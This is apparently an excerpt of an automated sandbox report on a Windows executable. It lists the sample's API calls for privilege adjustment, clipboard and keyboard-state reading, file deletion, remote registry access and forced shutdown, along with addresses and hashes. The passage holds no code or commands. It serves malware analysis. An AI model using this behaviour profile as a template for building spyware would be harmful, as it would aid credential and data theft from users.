                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                        • String ID: Shell_TrayWnd
                                                                        • API String ID: 4125248594-2988720461
                                                                        APIs
                                                                          • Part of subcall function 00EAB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EAB180
                                                                          • Part of subcall function 00EAB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00EAB1AD
                                                                          • Part of subcall function 00EAB134: GetLastError.KERNEL32 ref: 00EAB1BA
                                                                        • _memset.LIBCMT ref: 00EAAD08
                                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00EAAD5A
                                                                        • CloseHandle.KERNEL32(?), ref: 00EAAD6B
                                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00EAAD82
                                                                        • GetProcessWindowStation.USER32 ref: 00EAAD9B
                                                                        • SetProcessWindowStation.USER32(00000000), ref: 00EAADA5
                                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00EAADBF
                                                                          • Part of subcall function 00EAAB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00EAACC0), ref: 00EAAB99
                                                                          • Part of subcall function 00EAAB84: CloseHandle.KERNEL32(?,?,00EAACC0), ref: 00EAABAB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                        • String ID: $default$winsta0
                                                                        • API String ID: 2063423040-1027155976
                                                                        APIs
                                                                          • Part of subcall function 00EB6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00EB5FA6,?), ref: 00EB6ED8
                                                                          • Part of subcall function 00EB6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00EB5FA6,?), ref: 00EB6EF1
                                                                          • Part of subcall function 00EB725E: __wsplitpath.LIBCMT ref: 00EB727B
                                                                          • Part of subcall function 00EB725E: __wsplitpath.LIBCMT ref: 00EB728E
                                                                          • Part of subcall function 00EB72CB: GetFileAttributesW.KERNEL32(?,00EB6019), ref: 00EB72CC
                                                                        • _wcscat.LIBCMT ref: 00EB6149
                                                                        • _wcscat.LIBCMT ref: 00EB6167
                                                                        • __wsplitpath.LIBCMT ref: 00EB618E
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00EB61A4
                                                                        • _wcscpy.LIBCMT ref: 00EB6209
                                                                        • _wcscat.LIBCMT ref: 00EB621C
                                                                        • _wcscat.LIBCMT ref: 00EB622F
                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00EB625D
                                                                        • DeleteFileW.KERNEL32(?), ref: 00EB626E
                                                                        • MoveFileW.KERNEL32(?,?), ref: 00EB6289
                                                                        • MoveFileW.KERNEL32(?,?), ref: 00EB6298
                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 00EB62AD
                                                                        • DeleteFileW.KERNEL32(?), ref: 00EB62BE
                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EB62E1
                                                                        • FindClose.KERNEL32(00000000), ref: 00EB62FD
                                                                        • FindClose.KERNEL32(00000000), ref: 00EB630B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                        • String ID: \*.*
                                                                        • API String ID: 1917200108-1173974218
                                                                        APIs
                                                                        • OpenClipboard.USER32(00F0DC00), ref: 00EC6B36
                                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 00EC6B44
                                                                        • GetClipboardData.USER32(0000000D), ref: 00EC6B4C
                                                                        • CloseClipboard.USER32 ref: 00EC6B58
                                                                        • GlobalLock.KERNEL32(00000000), ref: 00EC6B74
                                                                        • CloseClipboard.USER32 ref: 00EC6B7E
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00EC6B93
                                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 00EC6BA0
                                                                        • GetClipboardData.USER32(00000001), ref: 00EC6BA8
                                                                        • GlobalLock.KERNEL32(00000000), ref: 00EC6BB5
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00EC6BE9
                                                                        • CloseClipboard.USER32 ref: 00EC6CF6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                        • String ID:
                                                                        • API String ID: 3222323430-0
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00EBF62B
                                                                        • FindClose.KERNEL32(00000000), ref: 00EBF67F
                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00EBF6A4
                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00EBF6BB
                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00EBF6E2
                                                                        • __swprintf.LIBCMT ref: 00EBF72E
                                                                        • __swprintf.LIBCMT ref: 00EBF767
                                                                        • __swprintf.LIBCMT ref: 00EBF7BB
                                                                          • Part of subcall function 00E9172B: __woutput_l.LIBCMT ref: 00E91784
                                                                        • __swprintf.LIBCMT ref: 00EBF809
                                                                        • __swprintf.LIBCMT ref: 00EBF858
                                                                        • __swprintf.LIBCMT ref: 00EBF8A7
                                                                        • __swprintf.LIBCMT ref: 00EBF8F6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                        • API String ID: 835046349-2428617273
                                                                        • Opcode ID: 133cc0b800bd05c22cea6e496e1f6248a1f4eb1557882af2554580f82e318d22
                                                                        • Instruction ID: 2dd756180545169a97f9fc4f8b9c3c2e19e78ee6cc5a518569cab1108ce48170
                                                                        • Opcode Fuzzy Hash: 133cc0b800bd05c22cea6e496e1f6248a1f4eb1557882af2554580f82e318d22
                                                                        • Instruction Fuzzy Hash: 9CA10DB2408344ABC311EBA5CC85DAFB7ECEF99704F405C2EF59992152EB34D949CB62
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00EC1B50
                                                                        • _wcscmp.LIBCMT ref: 00EC1B65
                                                                        • _wcscmp.LIBCMT ref: 00EC1B7C
                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00EC1B8E
                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 00EC1BA8
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00EC1BC0
                                                                        • FindClose.KERNEL32(00000000), ref: 00EC1BCB
                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00EC1BE7
                                                                        • _wcscmp.LIBCMT ref: 00EC1C0E
                                                                        • _wcscmp.LIBCMT ref: 00EC1C25
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00EC1C37
                                                                        • SetCurrentDirectoryW.KERNEL32(00F239FC), ref: 00EC1C55
                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EC1C5F
                                                                        • FindClose.KERNEL32(00000000), ref: 00EC1C6C
                                                                        • FindClose.KERNEL32(00000000), ref: 00EC1C7C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                        • String ID: *.*
                                                                        • API String ID: 1803514871-438819550
                                                                        • Opcode ID: e9d96f5968335a5718015996ea55ce8467591e88ad8e81095af4541c82b1ec88
                                                                        • Instruction ID: fed4b563a82d8a5dfedce6b755168d4decd86887ff53b60ccd70294d521eda4a
                                                                        • Opcode Fuzzy Hash: e9d96f5968335a5718015996ea55ce8467591e88ad8e81095af4541c82b1ec88
                                                                        • Instruction Fuzzy Hash: FF31E332605219AEDF14EBA0DD48FEE77AD9F46324F0001D9F801F2091EB75DE86DA60
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00EC1CAB
                                                                        • _wcscmp.LIBCMT ref: 00EC1CC0
                                                                        • _wcscmp.LIBCMT ref: 00EC1CD7
                                                                          • Part of subcall function 00EB6BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00EB6BEF
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00EC1D06
                                                                        • FindClose.KERNEL32(00000000), ref: 00EC1D11
                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00EC1D2D
                                                                        • _wcscmp.LIBCMT ref: 00EC1D54
                                                                        • _wcscmp.LIBCMT ref: 00EC1D6B
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00EC1D7D
                                                                        • SetCurrentDirectoryW.KERNEL32(00F239FC), ref: 00EC1D9B
                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EC1DA5
                                                                        • FindClose.KERNEL32(00000000), ref: 00EC1DB2
                                                                        • FindClose.KERNEL32(00000000), ref: 00EC1DC2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                        • String ID: *.*
                                                                        • API String ID: 1824444939-438819550
                                                                        • Opcode ID: 20010c7d221f609e5804cff98c64c070dbec4071c06a9b0dbe227fd8622d6220
                                                                        • Instruction ID: 524297bc2432deb352590164ef30a37d9a0b504a9f676f58ac02a8157bf8b63f
                                                                        • Opcode Fuzzy Hash: 20010c7d221f609e5804cff98c64c070dbec4071c06a9b0dbe227fd8622d6220
                                                                        • Instruction Fuzzy Hash: 18312A3150521A7ECF10AFA0DD08FEE7BAD9F46325F1015D5F801B3092DB35CA46DA50
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: _memset
                                                                        • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                                        • API String ID: 2102423945-2023335898
                                                                        • Opcode ID: e5b0617defe90a630823ea69f9d983abff32a5001098b66a7206219403b8b6b1
                                                                        • Instruction ID: 9184ea9a9680118c87c60400a8563949a89d713e4335bd519464dd9761106654
                                                                        • Opcode Fuzzy Hash: e5b0617defe90a630823ea69f9d983abff32a5001098b66a7206219403b8b6b1
                                                                        • Instruction Fuzzy Hash: 7C82A071D04259CBCB24CF98C8806EDBBB1FF44318F25A16AD859BB351E774AD81DB90
                                                                        APIs
                                                                        • GetLocalTime.KERNEL32(?), ref: 00EC09DF
                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00EC09EF
                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00EC09FB
                                                                        • __wsplitpath.LIBCMT ref: 00EC0A59
                                                                        • _wcscat.LIBCMT ref: 00EC0A71
                                                                        • _wcscat.LIBCMT ref: 00EC0A83
                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00EC0A98
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00EC0AAC
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00EC0ADE
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00EC0AFF
                                                                        • _wcscpy.LIBCMT ref: 00EC0B0B
                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00EC0B4A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                        • String ID: *.*
                                                                        • API String ID: 3566783562-438819550
                                                                        • Opcode ID: df1ec7c5f84bcadfc9eba53cacd8827e7b3ae1af076d76ec0f6de033ef40826b
                                                                        • Instruction ID: b626eaa1565b21c2efbf286140548e235786c27235c250adaa135cb52475fe5e
                                                                        • Opcode Fuzzy Hash: df1ec7c5f84bcadfc9eba53cacd8827e7b3ae1af076d76ec0f6de033ef40826b
                                                                        • Instruction Fuzzy Hash: FC6148725083059FD710EF60C944EAEB3E8FF89314F04991DF989A7252DB32E946CB92
                                                                        APIs
                                                                          • Part of subcall function 00EAABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00EAABD7
                                                                          • Part of subcall function 00EAABBB: GetLastError.KERNEL32(?,00EAA69F,?,?,?), ref: 00EAABE1
                                                                          • Part of subcall function 00EAABBB: GetProcessHeap.KERNEL32(00000008,?,?,00EAA69F,?,?,?), ref: 00EAABF0
                                                                          • Part of subcall function 00EAABBB: HeapAlloc.KERNEL32(00000000,?,00EAA69F,?,?,?), ref: 00EAABF7
                                                                          • Part of subcall function 00EAABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00EAAC0E
                                                                          • Part of subcall function 00EAAC56: GetProcessHeap.KERNEL32(00000008,00EAA6B5,00000000,00000000,?,00EAA6B5,?), ref: 00EAAC62
                                                                          • Part of subcall function 00EAAC56: HeapAlloc.KERNEL32(00000000,?,00EAA6B5,?), ref: 00EAAC69
                                                                          • Part of subcall function 00EAAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00EAA6B5,?), ref: 00EAAC7A
                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00EAA6D0
                                                                        • _memset.LIBCMT ref: 00EAA6E5
                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00EAA704
                                                                        • GetLengthSid.ADVAPI32(?), ref: 00EAA715
                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00EAA752
                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00EAA76E
                                                                        • GetLengthSid.ADVAPI32(?), ref: 00EAA78B
                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00EAA79A
                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00EAA7A1
                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00EAA7C2
                                                                        • CopySid.ADVAPI32(00000000), ref: 00EAA7C9
                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00EAA7FA
                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00EAA820
                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00EAA834
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                        • String ID:
                                                                        • API String ID: 3996160137-0
                                                                        • Opcode ID: 6a3281c0dfd423da131fe518338fa1005bb921cc59da4e3e0e1c0b34979524f7
                                                                        • Instruction ID: a25a9d95a7c54eb6fea74b174cf49dcabb13d82e2cb8155906eec58824715439
                                                                        • Opcode Fuzzy Hash: 6a3281c0dfd423da131fe518338fa1005bb921cc59da4e3e0e1c0b34979524f7
                                                                        • Instruction Fuzzy Hash: 0B513E71900209AFDF149F95DC44AEEBBBAFF49304F089129F915BA291DB34AA05CB61
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                        • API String ID: 0-4052911093
                                                                        • Opcode ID: d112369b45fa5d0896847ebeefe3230ffdb2de93385698a1443ce88103429854
                                                                        • Instruction ID: 31bba4b206a349705a19dd62bdcfc11c490388a1684e3a7bae6219498fc155cc
                                                                        • Opcode Fuzzy Hash: d112369b45fa5d0896847ebeefe3230ffdb2de93385698a1443ce88103429854
                                                                        • Instruction Fuzzy Hash: E8728071E042199BDB24CF58D8407FEB7B5BF04314F24916AEA59FB281EB709E81DB90
                                                                        APIs
                                                                          • Part of subcall function 00EB6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00EB5FA6,?), ref: 00EB6ED8
                                                                          • Part of subcall function 00EB72CB: GetFileAttributesW.KERNEL32(?,00EB6019), ref: 00EB72CC
                                                                        • _wcscat.LIBCMT ref: 00EB6441
                                                                        • __wsplitpath.LIBCMT ref: 00EB645F
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00EB6474
                                                                        • _wcscpy.LIBCMT ref: 00EB64A3
                                                                        • _wcscat.LIBCMT ref: 00EB64B8
                                                                        • _wcscat.LIBCMT ref: 00EB64CA
                                                                        • DeleteFileW.KERNEL32(?), ref: 00EB64DA
                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EB64EB
                                                                        • FindClose.KERNEL32(00000000), ref: 00EB6506
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                        • String ID: \*.*
                                                                        • API String ID: 2643075503-1173974218
                                                                        • Opcode ID: aca97e20dfffa1ff810bc403f832f40569d2ce3c5a0bf3a9aa8626f8baf4d878
                                                                        • Instruction ID: b8e28033fd9c6c848fb3f61941f3dff09d69abebb854ed53a922fa006d5501b0
                                                                        • Opcode Fuzzy Hash: aca97e20dfffa1ff810bc403f832f40569d2ce3c5a0bf3a9aa8626f8baf4d878
                                                                        • Instruction Fuzzy Hash: 0231D4B240C388AEC721DBA48C84ADBB7DCAF95304F40192AF6D8D3141EA35D54DC7A3
                                                                        APIs
                                                                          • Part of subcall function 00ED3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00ED2BB5,?,?), ref: 00ED3C1D
                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00ED328E
                                                                          • Part of subcall function 00E7936C: __swprintf.LIBCMT ref: 00E793AB
                                                                          • Part of subcall function 00E7936C: __itow.LIBCMT ref: 00E793DF
                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00ED332D
                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00ED33C5
                                                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00ED3604
                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00ED3611
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                        • String ID:
                                                                        • API String ID: 1240663315-0
                                                                        • Opcode ID: 309f410242f611b7617f722e536c8057699fddbc85d766f010ce22e2cd1953e2
                                                                        • Instruction ID: 726425f5000490a5a2a4898a6c314debec1f33b6566c5623a4dd1d3705863b65
                                                                        • Opcode Fuzzy Hash: 309f410242f611b7617f722e536c8057699fddbc85d766f010ce22e2cd1953e2
                                                                        • Instruction Fuzzy Hash: 1DE16F35604200AFCB14DF29C991D6ABBE9EF89314F04955EF45AE7361DB30ED06CB52
                                                                        APIs
                                                                        • GetKeyboardState.USER32(?), ref: 00EB2B5F
                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00EB2BE0
                                                                        • GetKeyState.USER32(000000A0), ref: 00EB2BFB
                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00EB2C15
                                                                        • GetKeyState.USER32(000000A1), ref: 00EB2C2A
                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00EB2C42
                                                                        • GetKeyState.USER32(00000011), ref: 00EB2C54
                                                                        • GetAsyncKeyState.USER32(00000012), ref: 00EB2C6C
                                                                        • GetKeyState.USER32(00000012), ref: 00EB2C7E
                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00EB2C96
                                                                        • GetKeyState.USER32(0000005B), ref: 00EB2CA8
                                                                        Similarity
                                                                        • API ID: State$Async$Keyboard
                                                                        • String ID:
                                                                        • API String ID: 541375521-0
                                                                        • Opcode ID: 8249e20527250677a7a70708e54a56f8b85ec452b3563827acfa1f35a51b3c09
                                                                        • Instruction ID: fe8f46de0372ce117c4c8da237db7f86d81abef6fed27816b58c36ffd87a63a1
                                                                        • Opcode Fuzzy Hash: 8249e20527250677a7a70708e54a56f8b85ec452b3563827acfa1f35a51b3c09
                                                                        • Instruction Fuzzy Hash: 3E41A1305087C96DFB319B6089483FBFEA16F11348F04905DD7C67A2C1DAA599C8CBA2
                                                                        APIs
                                                                        Similarity
                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                        • String ID:
                                                                        • API String ID: 1737998785-0
                                                                        • Opcode ID: 56c6c72a5c7aaadbc5d1f9f3dfd21ef370e10cbc48979bad3b0d3cd71e53326b
                                                                        • Instruction ID: f8d6fab799cbb54d74d5e8d8d236e516e1c81a6afb7d7b9f928d794addc05c48
                                                                        • Opcode Fuzzy Hash: 56c6c72a5c7aaadbc5d1f9f3dfd21ef370e10cbc48979bad3b0d3cd71e53326b
                                                                        • Instruction Fuzzy Hash: 5D216B31304110AFDB11AF65DD49B7E7BE9EF84721F019019F90AEB261CB31E801CB90
                                                                        APIs
                                                                          • Part of subcall function 00EA9ABF: CLSIDFromProgID.OLE32 ref: 00EA9ADC
                                                                          • Part of subcall function 00EA9ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00EA9AF7
                                                                          • Part of subcall function 00EA9ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00EA9B05
                                                                          • Part of subcall function 00EA9ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00EA9B15
                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00ECC235
                                                                        • _memset.LIBCMT ref: 00ECC242
                                                                        • _memset.LIBCMT ref: 00ECC360
                                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 00ECC38C
                                                                        • CoTaskMemFree.OLE32(?), ref: 00ECC397
                                                                        Strings
                                                                        • NULL Pointer assignment, xrefs: 00ECC3E5
                                                                        Similarity
                                                                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                        • String ID: NULL Pointer assignment
                                                                        • API String ID: 1300414916-2785691316
                                                                        • Opcode ID: 75d9b2cc923ae93a0743f016cf15108b8754ef52f0d94989aaac1f1c81c0afbc
                                                                        • Instruction ID: b94fe02dc8c6efb3dbd016d263ea1a31c60a85fbbb86a5784e2a74f8f057a8ab
                                                                        • Opcode Fuzzy Hash: 75d9b2cc923ae93a0743f016cf15108b8754ef52f0d94989aaac1f1c81c0afbc
                                                                        • Instruction Fuzzy Hash: 69913971D00218ABDB14DF94DD81EEEBBB9EF08710F20915AF519B7281DB719A46CFA0
                                                                        APIs
                                                                          • Part of subcall function 00EAB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EAB180
                                                                          • Part of subcall function 00EAB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00EAB1AD
                                                                          • Part of subcall function 00EAB134: GetLastError.KERNEL32 ref: 00EAB1BA
                                                                        • ExitWindowsEx.USER32(?,00000000), ref: 00EB7A0F
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                        • String ID: $@$SeShutdownPrivilege
                                                                        • API String ID: 2234035333-194228
                                                                        • Opcode ID: 0b826539c724c99d106025d8e2961d7a43ac692593bcc3bbeded55e2cd6ac0e6
